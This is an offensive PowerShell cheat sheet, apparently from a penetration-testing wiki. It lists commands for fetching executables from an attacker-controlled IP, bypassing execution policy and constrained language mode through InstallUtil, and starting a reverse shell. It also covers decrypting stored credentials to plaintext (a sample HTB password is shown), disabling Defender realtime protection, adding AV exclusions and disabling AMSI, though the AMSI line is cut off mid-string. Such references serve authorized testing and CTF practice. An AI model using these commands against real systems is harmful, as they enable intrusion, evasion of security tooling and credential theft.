Powershell

Offensive PowerShell

Powershell Path:

C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell

Download:

Invoke-Webrequest -URI http://IP/file.exe -O file.exe
(New-Object Net.WebClient).DownloadFile("http://IP/file.exe","C:\Windows\Temp\file.exe")
wget http://IP/file.exe -OutFile file.exe
curl http://IP/file.exe -O file.exe

Execution Policy:

Get-ExecutionPolicy

Bypass ExecutionPolicy:

PowerShell.exe -ExecutionPolicy Bypass -File .\file.ps1
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

Constrained Language:

$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage

use PSByPassCLM. To compile it you may need to Add a Reference -> Browse ->Browse -> add C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\_31bf3856ad364e35\System.Management.Automation.dll_ and change the project to .Net4.5.

Direct bypass:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe

Reverse shell:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revs

Secure String to Plaintext

$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | fl

UserName       : Tom
Password       : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain         : HTB

Or directly parsing form XML:

$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *

UserName       : Tom
Password       : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain         : HTB

Antivirus (Requires Higher Privileges)

#Check status
Get-MpComputerStatus
#Disable
Set-MpPreference -DisableRealtimeMonitoring $true
#Set exclusion path
Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
#Disable AMSI
"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,St

Execute Commands as Another User

#CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)

# Execute `whoami` command
Invoke-Command -Computer <Computer-Name> -ScriptBlock { whoami } -Credential $cred

Scheduled Tasks

Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

PreviousWriteOwner NextPassword Spray And Roasting

Last updated 3 years ago

hashtagPowershell Path:

hashtagDownload:

hashtagExecution Policy:

hashtagBypass ExecutionPolicy:

hashtagConstrained Language:

hashtagDirect bypass:

hashtagReverse shell:

hashtagSecure String to Plaintext

hashtagAntivirus (Requires Higher Privileges)

hashtagExecute Commands as Another User

hashtagScheduled Tasks